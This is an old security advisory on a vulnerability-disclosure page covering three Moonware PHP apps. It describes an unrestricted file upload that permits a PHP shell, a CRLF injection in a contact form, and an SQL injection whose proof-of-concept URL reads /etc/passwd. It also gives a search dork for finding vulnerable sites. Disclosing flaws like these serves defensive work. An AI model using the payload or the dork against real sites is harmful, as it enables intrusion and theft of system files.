Moonware Software Multiple Vulnerabilities

2007.08.31
Credit: s0cratex
Risk: High
Local: No
Remote: Yes
CVE: CVE-2007-4612 | CVE-2007-4611 | CVE-2007-4610
CWE: N/A
Dork: \"Powered by: Dale Mooney Gallery\"

Moonware Software Multiple Vulnerabilities by s0cratex -------- MSN: s0cratex[at]nasa[dot]gov Moonware Homepage: http://dalemooney.lost-soldiers.com I. Moon Gallery ---- ------- Bug: Arbitrary file upload Dork: "Powered by: Dale Mooney Gallery" Details: The file /config/upload.php don't have any restriction, 6:$target_path = $target_path . basename( $_FILES['uploadedfile']['name']); 8:if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { U can upload a PHP Shell and found it in the subdir /images/ II. Calendar Events -------- ------ Bug: SQL Injections Details: The variable $get is not verified in the file viewevent.php. (We need magic_quotes_gpc = Off) 8:$get = mysql_query("SELECT * FROM cal_events WHERE id = '$id'"); p0c: viewevent.php?id=-1' union select 1,load_file('/etc/passwd'),1,1/* III. Moonware Contact Form -------- ------- ---- Bug: CRLF Injection Details: File contact.php line 26-35 if($Submit){ $to = $email; $subject = $_POST["subject"]; $email = $_POST["email"]; $message = $_POST["message"]; $name = $_POST["name"]; $datetime = date("D, d M Y H:i:s"); $finalmessage = "Message from: $name n Subject: $subject n Email: $email n Date Sent: $datetime n Message:nn $message"; 44:$sent = mail($to,$subject,$finalmessage); The vars are not verified and i can insert rn... oops!! #EOF


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top